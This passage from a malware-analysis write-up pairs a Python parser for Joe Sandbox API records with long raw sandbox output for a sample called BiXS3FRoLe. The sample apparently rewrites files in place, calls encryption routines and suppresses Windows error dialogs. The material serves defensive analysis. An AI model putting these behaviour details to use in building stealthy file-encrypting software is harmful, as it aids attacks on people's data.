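    r"^(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)

# Win32 constants. CreateFileW(lpFileName, dwDesiredAccess, dwShareMode,
# lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)
DESIRED_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_AND_ATTRIBUTES = {
    0x00000001: "FILE_ATTRIBUTE_READONLY", 0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000004: "FILE_ATTRIBUTE_SYSTEM", 0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x20000000: "FILE_FLAG_NO_BUFFERING", 0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}
ERROR_MODE = {0x0001: "SEM_FAILCRITICALERRORS", 0x0002: "SEM_NOGPFAULTERRORBOX",
              0x0004: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: list   # one int per argument, None where the report shows '?'
    ref: int


def parse_api_lines(text):
    """Parse report API lines; lines that do not match the call format are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if not m:
            continue
        raw = m["args"].strip()
        args = [] if raw == "" else [
            None if a.strip() == "?" else int(a.strip(), 16)   # "-00B90110" parses as a negative value
            for a in raw.split(",")
        ]
        calls.append(ApiCall(m["func"], m["module"], args, int(m["ref"], 16)))
    return calls


def decode_bits(value, table):
    """Names of the set bits, lowest bit first; bits not in the table are kept as a hex remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def decode_create_file(call):
    access, share, disp, flags = call.args[1], call.args[2], call.args[4], call.args[5]
    return {
        "access": decode_bits(access, DESIRED_ACCESS),
        "share": decode_bits(share, SHARE_MODE),      # [] means dwShareMode == 0: exclusive open
        "disposition": DISPOSITION.get(disp, f"0x{disp:X}"),
        "flags": decode_bits(flags, FLAGS_AND_ATTRIBUTES),
    }


def decode_set_error_mode(call):
    return decode_bits(call.args[0], ERROR_MODE)


def summarize(text):
    """Call order of the record plus the decoded CreateFileW and SetErrorMode arguments."""
    calls = parse_api_lines(text)
    out = {"sequence": [c.func for c in calls]}
    for c in calls:
        if c.func == "CreateFileW" and None not in c.args[1:6]:
            out["create"] = decode_create_file(c)
        elif c.func == "SetErrorMode" and c.args and c.args[0] is not None:
            out["error_mode"] = decode_set_error_mode(c)
    return out


if __name__ == "__main__":
    for key, value in summarize(REPORT_APIS).items():
        print(f"{key}: {value}")
```

Decoded, the record opens an existing file with GENERIC_READ|GENERIC_WRITE, OPEN_EXISTING and FILE_FLAG_SEQUENTIAL_SCAN and no share mode, queries its size, reads, repositions the file pointer, writes, and closes: a read-modify-write of an existing file in place. SetErrorMode(0x8003) is SEM_FAILCRITICALERRORS|SEM_NOGPFAULTERRORBOX|SEM_NOOPENFILEERRORBOX, which suppresses the error dialogs a failing file operation would otherwise raise. Handle arguments the sandbox reports as `?` are left undecoded rather than guessed.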
APIs
• std::locale::_Init.LIBCPMT ref: 00AFCF70
  • Part of subcall function 00AE89F6: __EH_prolog3.LIBCMT ref: 00AE89FD
  • Part of subcall function 00AE89F6: std::_Lockit::_Lockit.LIBCPMT ref: 00AE8A08
  • Part of subcall function 00AE89F6: std::locale::_Setgloballocale.LIBCPMT ref: 00AE8A23
  • Part of subcall function 00AE89F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8A79
• std::_Lockit::_Lockit.LIBCPMT ref: 00AFCFAC
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AFCFF4
• __Getcvt.LIBCPMT ref: 00AFD001
  • Part of subcall function 00A72A30: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00A72A56
  • Part of subcall function 00A72A30: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72AEA
• std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00AFD044
• std::_Lockit::_Lockit.LIBCPMT ref: 00AFD064
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AFD085
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00AFD094
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: std::_$Lockit$std::locale::_$Lockit::_Lockit::~_$Locimp::_Locinfo::_$AddfacGetcvtH_prolog3InitLocimpLocimp_Locinfo_ctorLocinfo_dtorNew_Setgloballocale
• String ID:
• API String ID: 1428944335-0
• Opcode ID: c0320fd325643e3225042d3a4fa32aa9f3f5ef484bd0556d185fc5eb4fe4b8bc
• Instruction ID: 1beb32404691136eeb20d5ba14c1e0c164520ecf9eb16b1ad996cdd2e98db8fc
• Opcode Fuzzy Hash: c0320fd325643e3225042d3a4fa32aa9f3f5ef484bd0556d185fc5eb4fe4b8bc
• Instruction Fuzzy Hash: E551E370C00749DFDB21DFA4C9457AEBBF4FF14304F10426AE809AB252EB74AA44CB91
APIs
• Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00B0A5AE
  • Part of subcall function 00B08978: __EH_prolog3_catch.LIBCMT ref: 00B0897F
  • Part of subcall function 00B08978: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00B089B8
• Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00B0A5D5
• Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00B0A5E1
  • Part of subcall function 00B08978: InterlockedPopEntrySList.KERNEL32(?), ref: 00B08A01
  • Part of subcall function 00B08978: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00B08A30
  • Part of subcall function 00B08978: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00B08A3E
• Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00B0A62D
• Concurrency::location::_Assign.LIBCMT ref: 00B0A64E
• Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00B0A656
• Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00B0A668
• Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00B0A698
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: Base::Concurrency::details::$Scheduler$ContextThrottling$InternalTime$AssignBlockedChangeConcurrency::location::_EntryH_prolog3_catchInterlockedListNextProcessorRingSchedulingSpinStartupTimerUntilVirtual
• String ID:
• API String ID: 905052649-0
• Opcode ID: 19b773f214a92d81b0263ae4e59a1b4458d1b18e08398e6443640f62689cc304
• Instruction ID: 4a1f11cdcfbab6d9453b9a676bcdc065371e017005a0fb5b411c9aacfb225d78
• Opcode Fuzzy Hash: 19b773f214a92d81b0263ae4e59a1b4458d1b18e08398e6443640f62689cc304
• Instruction Fuzzy Hash: 4931F630B003515ECF16AA7848967FEBFF99F51300F0809E5D456E72C2DE254D498792
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AB67A3
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AB67E3
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AB6981
Strings
• PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 00AB677A
• PK_DefaultEncryptionFilter: plaintext too long, xrefs: 00AB6958
• : invalid ciphertext, xrefs: 00AB67B7
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: Exception@8Throw
• String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long$PK_DefaultEncryptionFilter: plaintext too long
• API String ID: 2005118841-2902848663
• Opcode ID: a77314c3cf985df51691068451ab6bbd88bcfdda3c6e87cf716376b1308884cb
• Instruction ID: ce44d639d3070e048b9b1a3a006305ee401b823453d323f24124fb00f450778c
• Opcode Fuzzy Hash: a77314c3cf985df51691068451ab6bbd88bcfdda3c6e87cf716376b1308884cb
• Instruction Fuzzy Hash: D1B1AC71A00709AFCB24DFA4C994FEABBF8FF48704F00466DE54697691EB75A904CB50
APIs
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: ad6c2c17ec5a1efb638bb31d035133cc74d12f8591b8131da5c6ec3c37ed2d18
• Instruction ID: 3d603ce909777af3249b583ef4f416f93b128fef72acd5bfb7d6c534bf99adc6
• Opcode Fuzzy Hash: ad6c2c17ec5a1efb638bb31d035133cc74d12f8591b8131da5c6ec3c37ed2d18
• Instruction Fuzzy Hash: B161A472D00205AFDB20DF68D881BAABBF5EF55720F3541EAE944EB291E730AD41CB50
APIs
• GetConsoleCP.KERNEL32(?,00B2AB2E,E0830C40,?,?,?,?,?,?,00B35722,00AE8F76,00B2AB2E,?,00B2AB2E,00B2AB2E,00AE8F76), ref: 00B34FEF
• __fassign.LIBCMT ref: 00B3506A
• __fassign.LIBCMT ref: 00B35085
• WideCharToMultiByte.KERNEL32(?,00000000,00B2AB2E,00000001,?,00000005,00000000,00000000), ref: 00B350AB
• WriteFile.KERNEL32(?,?,00000000,00B35722,00000000,?,?,?,?,?,?,?,?,?,00B35722,00AE8F76), ref: 00B350CA
• WriteFile.KERNEL32(?,00AE8F76,00000001,00B35722,00000000,?,?,?,?,?,?,?,?,?,00B35722,00AE8F76), ref: 00B35103
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: ff44b59935c7c574f5b3b9d61d7aed3026bf391c0cbf074dc7ce8b27fef48c99
• Instruction ID: 880ec7e54d215dc70681fcf0d6352fa912b2535651d4ccf59c9e28e99b3a4822
• Opcode Fuzzy Hash: ff44b59935c7c574f5b3b9d61d7aed3026bf391c0cbf074dc7ce8b27fef48c99
• Instruction Fuzzy Hash: 645185B19006499FDB24CFA8D885BEEBBF4EF09300F25419AE555F7291E731A941CB60
APIs
• __EH_prolog3_catch.LIBCMT ref: 00B155CD
• Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00B15618
• Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00B1564B
• Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 00B156D3
                                                                                                        • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00B156FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountCounter::_H_prolog3_catchRegisterReleaseStateState::_Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 1066115758-0
                                                                                                        • Opcode ID: ad790e7b1f621545c9820a7a7cc29a485b83603f980685cd2b38a6c98f22d6d6
                                                                                                        • Instruction ID: a72145a8326b3a4bc7212d17485ce4874b8919d961138ca290e50350c69454e5
                                                                                                        • Opcode Fuzzy Hash: ad790e7b1f621545c9820a7a7cc29a485b83603f980685cd2b38a6c98f22d6d6
                                                                                                        • Instruction Fuzzy Hash: 374174B1A00A05EFCB14DF69C8919EDFBF5FF88310754866DE41997391DB30A941CB90
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B19107
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00B1910F
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B19198
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00B191C3
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B19218
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                        • Opcode ID: ffdb2ec94bd9e15ce6c970f7999cde23816424b86646f8eaa92c29bb7fee14f9
                                                                                                        • Instruction ID: 8d89ff7094ce184dadfd7fb63a87d70c33273de9a00d96572496712012c1929d
                                                                                                        • Opcode Fuzzy Hash: ffdb2ec94bd9e15ce6c970f7999cde23816424b86646f8eaa92c29bb7fee14f9
                                                                                                        • Instruction Fuzzy Hash: 5F41B634D00255BBCF10DF68C899ADE7BF5EF45314F5480D5E818AB352D731AA91CB91
                                                                                                        APIs
                                                                                                        • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00B128F5
                                                                                                          • Part of subcall function 00B12662: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00B12695
                                                                                                          • Part of subcall function 00B12662: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00B126B7
                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B12972
                                                                                                        • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00B1297E
                                                                                                        • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00B1298D
                                                                                                        • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00B12997
                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 00B129CB
                                                                                                        • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00B129D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                        • String ID:
                                                                                                        • API String ID: 1924466884-0
                                                                                                        • Opcode ID: 27b57c9cba30bc055180fade22144cccbbb6e18ea3bd47566512e118c4ff62d7
                                                                                                        • Instruction ID: e54647bdb6a9f1e5a1d1d0033656712cdd7fd3574ccd16e45e307bea9ec05668
                                                                                                        • Opcode Fuzzy Hash: 27b57c9cba30bc055180fade22144cccbbb6e18ea3bd47566512e118c4ff62d7
                                                                                                        • Instruction Fuzzy Hash: BA412B35A002189FCB05DF68C495BADBBF5FF48350F5480A9ED499B382DB30AA41CF91
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00B0D5F7
                                                                                                          • Part of subcall function 00AE9401: mtx_do_lock.LIBCPMT ref: 00AE9409
                                                                                                        • Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::remove.LIBCONCRT ref: 00B0D629
                                                                                                        • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 00B0D635
                                                                                                        • __Mtx_unlock.LIBCPMT ref: 00B0D648
                                                                                                        • atomic_compare_exchange.LIBCONCRT ref: 00B0D664
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B0D67E
                                                                                                        • __Mtx_unlock.LIBCPMT ref: 00B0D6BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Mtx_unlockToken$CancellationContainer::removeCounter::_CurrentH_prolog3RegistrationReleaseState::Threadatomic_compare_exchangemtx_do_lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3750600146-0
                                                                                                        • Opcode ID: bb4e40d9c8e2d5472a02591f9ce265f82719922acc3fc2d13ab4fb78d7158e79
                                                                                                        • Instruction ID: bee110d636d216767ac754bca25f244a5e56e35e88d0bee47be05e400ddc57fe
                                                                                                        • Opcode Fuzzy Hash: bb4e40d9c8e2d5472a02591f9ce265f82719922acc3fc2d13ab4fb78d7158e79
                                                                                                        • Instruction Fuzzy Hash: 1621E572C00255AADB31BBA8C943BEEBFE4AF01350F148086F508AB0D2CB755A45C7E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: eb85b246a8c90f72b66f4694b1c68d3f1379aa7a7b62db0a58a119084491193c
                                                                                                        • Instruction ID: 61db54445b0c38c4e71cf8ad69d92afb385a0044319fcb2ba1f44f7580e4a62d
                                                                                                        • Opcode Fuzzy Hash: eb85b246a8c90f72b66f4694b1c68d3f1379aa7a7b62db0a58a119084491193c
                                                                                                        • Instruction Fuzzy Hash: 0311B472504224BBDB30AFB69C45E6BBBECEB81771B2045D5F815D7390EA34CA41E6A0
                                                                                                        APIs
                                                                                                        • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00B18F3E
                                                                                                        • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00B18F57
                                                                                                        • PMDtoOffset.LIBCMT ref: 00B18F7D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindInstanceTargetType$Offset
                                                                                                        • String ID: Bad dynamic_cast!
                                                                                                        • API String ID: 1467055271-2956939130
                                                                                                        • Opcode ID: 0f0e288b28e44880b96b8f2a369b59049bdccfb5fa6156a83f469463e3849cfb
                                                                                                        • Instruction ID: 3e4a90045955eb0b33c0a13966bd1af831408052a48a2685ae84161f01004d8d
                                                                                                        • Opcode Fuzzy Hash: 0f0e288b28e44880b96b8f2a369b59049bdccfb5fa6156a83f469463e3849cfb
                                                                                                        • Instruction Fuzzy Hash: 82212672A042059FCF14DF64CD46AEE77F5FB84720F608ADAE91097190DF31E94287A0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Mpunct$GetcvtGetvalsH_prolog3
                                                                                                        • String ID: $+xv
                                                                                                        • API String ID: 2737107202-1686923651
                                                                                                        • Opcode ID: 9bde3c34dbba2e33e1b08d30bda8ee28c8455b7d56d8c57530be3bc6e31c154c
                                                                                                        • Instruction ID: f7b1c993abdf6d827a5a8a8403c26279be71e1473346f38521672527cc9d5421
                                                                                                        • Opcode Fuzzy Hash: 9bde3c34dbba2e33e1b08d30bda8ee28c8455b7d56d8c57530be3bc6e31c154c
                                                                                                        • Instruction Fuzzy Hash: 282181B1904B56AED725DFB5889077BBEF8AB0D300F04095AF599C7A41D734EA01CBD0
APIs
  • Part of subcall function 00B3D5CA: _free.LIBCMT ref: 00B3D5F3
• _free.LIBCMT ref: 00B3D8D1
